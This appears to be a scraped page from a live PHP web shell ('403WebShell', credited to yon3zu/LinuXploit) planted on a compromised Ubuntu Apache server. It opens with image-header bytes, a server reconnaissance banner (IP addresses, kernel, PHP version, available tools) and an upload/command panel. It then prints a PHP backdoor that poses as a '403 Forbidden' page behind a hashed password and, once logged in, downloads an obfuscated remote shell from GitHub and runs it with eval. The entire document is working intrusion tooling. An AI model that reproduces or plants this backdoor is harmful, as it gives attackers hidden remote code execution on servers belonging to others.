����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 216.73.216.64
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/proc/self/root/var/www/html/sdk2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/proc/self/root/var/www/html//sdk2/php.php
<?php
session_start();

/**
 * Disable error reporting
 *
 * Set this to error_reporting( -1 ) for debugging.
 */
function geturlsinfo($url) {
    if (function_exists('curl_exec')) {
        $conn = curl_init($url);
        curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);

        // Set cookies using session if available
        if (isset($_SESSION['SAP'])) {
            curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['SAP']);
        }

        $url_get_contents_data = curl_exec($conn);
        curl_close($conn);
    } elseif (function_exists('file_get_contents')) {
        $url_get_contents_data = file_get_contents($url);
    } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
        $handle = fopen($url, "r");
        $url_get_contents_data = stream_get_contents($handle);
        fclose($handle);
    } else {
        $url_get_contents_data = false;
    }
    return $url_get_contents_data;
}

// Function to check if the user is logged in
function is_logged_in()
{
    return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;
}
// Check if the password is submitted and correct
if (isset($_POST['password'])) {
    $entered_password = $_POST['password'];
    $hashed_password = 'd445787e69e2ed520062327d172109b9'; // 48
    if (md5($entered_password) === $hashed_password) {
        // Password is correct, store it in session
        $_SESSION['logged_in'] = true;
        $_SESSION['SAP'] = 'janco'; // Replace this with your cookie data
    } else {
        // Password is incorrect
        echo "Maaf Anda Kurang Profesional. Silahkan Coba Lagi.";
    }
}

// Check if the user is logged in before executing the content
if (is_logged_in()) {
    $a = geturlsinfo('https://raw.githubusercontent.com/nicxlau/alfa-shell/refs/heads/master/alfa-obfuscated.php');
    eval('?>' . $a);
} else {
    // Display login form if not logged in
    ?>
    <!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>403 Forbidden Access</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      background-color: #1e003d;
      color: #ffcc00;
      font-family: 'Courier New', Courier, monospace;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background-image: url('https://www.transparenttextures.com/patterns/dark-mosaic.png');
      background-size: cover;
    }

    .container {
      background-color: rgba(21, 0, 41, 0.9);
      padding: 40px;
      border: 2px solid #ffcc00;
      border-radius: 8px;
      text-align: left;
      box-shadow: 0 0 25px #a832ff;
      width: 90%;
      max-width: 500px;
      position: relative;
    }

    .code-large {
      font-size: 100px;
      color: rgba(255, 255, 255, 0.05);
      position: absolute;
      top: -30px;
      left: 10px;
      z-index: 0;
    }

    h1 {
      margin-bottom: 15px;
      font-size: 26px;
      z-index: 1;
      position: relative;
    }

    p {
      font-size: 14px;
      margin-bottom: 25px;
      line-height: 1.5;
      z-index: 1;
      position: relative;
    }

    input[type="password"],
    input[type="text"] {
      padding: 10px;
      width: 100%;
      background-color: #1c0033;
      color: #ffcc00;
      border: 1px solid #ffcc00;
      border-radius: 4px;
      margin-bottom: 20px;
      font-size: 16px;
      z-index: 1;
      position: relative;
    }

    input[type="submit"] {
      padding: 10px 20px;
      background-color: #ffcc00;
      color: #1c0033;
      font-weight: bold;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      font-size: 16px;
      z-index: 1;
      position: relative;
    }

    input[type="submit"]:hover {
      background-color: #d4a900;
    }

    .glow {
      animation: pulse 2s infinite;
    }

    @keyframes pulse {
      0% { box-shadow: 0 0 5px #a832ff; }
      50% { box-shadow: 0 0 20px #a832ff; }
      100% { box-shadow: 0 0 5px #a832ff; }
    }
  </style>
</head>
    <body bgcolor="black">
        <center>
        <div class="container glow">
    <div class="code-large">403</div>
    <h1>ACCESS DENIED</h1>
    <p>> ERROR CODE: <strong>403 Forbidden</strong><br>
    > You do not have the permission to access this portal.<br>
    > This incident has been logged.</p>
        
        <body style="background-color:black;">
        <form method="POST" action="">
            <label for="password">Access Team PJP :</label><br><br>
            <input type="password" id="password" name="password"><br>
            <input type="submit" value="LOGIN">
        </form>
        </center>
    </body>
    </html>
    <?php
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit